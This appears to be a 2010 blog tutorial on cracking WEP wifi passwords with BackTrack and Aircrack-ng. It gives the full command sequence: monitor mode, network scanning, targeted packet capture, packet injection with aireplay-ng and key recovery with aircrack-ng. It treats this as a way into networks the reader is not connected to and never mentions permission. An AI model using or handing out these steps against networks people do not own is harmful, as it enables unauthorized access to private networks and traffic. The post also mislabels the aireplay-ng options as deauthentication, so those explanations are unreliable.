Thursday, June 17, 2010


Before we do wireless cracking, you need to be aware of some of the terms associated with wireless cracking.

WAP - Wireless Access Point
SSID - Service Set Identifier (name of a wireless local area network)

ESSID - Extended Service Set Identifier
BSSID - Basic Service Set Identifier

MAC - Media Access Control( It is 12 digit hexadecimal number)
WEP - Wired Equivalent Privacy

In Windows OS we cannot collect packets of a network that we are not connected to.
Thus we use Linux OS called BackTrack which is a Live OS(can be booted directly from a cd or a removable device). In Backtrack, we use the package Aircrack-ng to perform wireless cracking. If you are using Ubuntu , then you need not use Backtrack. You can install the package Aircarck-ng in Ubuntu(if it is not installed already).


Open console in Backtrack or terminal in Ubuntu and perform following steps,

1) Get the name of the Wireless Adapter installed in the PC.


Let us assume the name given by backtrack is wlan0

2) Configure the wireless adapter in Monitor mode.

airmon-ng start wlan0

Let the interface name given by backtrack be mon0

3) Find out the wireless networks available around PC.

airodump-ng mon0

After you enter the following command the scanning process begins to look for wireless networks. Press Ctrl + C to stop the scanning process.
Let us consider that the following details are provided by Backtrack after we execute this command,

ESSID : paul
channel no : 9
BSSID : 00:54:C2:17:2A:92

4) Start the wireless collection of data packets.

airodump-ng -c 9 --bssid 00:54:C2:17:2A:92 -w abcd mon0

here abcd is the capture file that captures the data packets.
You have to wait until a minimum of 20000 data packets are captured.

5) Open new Console or terminal.

6) Try to send some Deauthentication packets. Deauthentication packets are those which disconnects a computer from the network.

aireplay-ng -1 0 -a 00:54:C2:17:2A:92 -e paul mon0

7) Replay the deauthentication packets.

aireplay-ng -3 -b 00:54:C2:17:2A:92 -e paul mon0

8) Crack the capture file

aircrack-ng --bssid
00:54:C2:17:2A:92 abcd-01.cap

On executing the above command we get the password for the wireless network. Use the key without colon.

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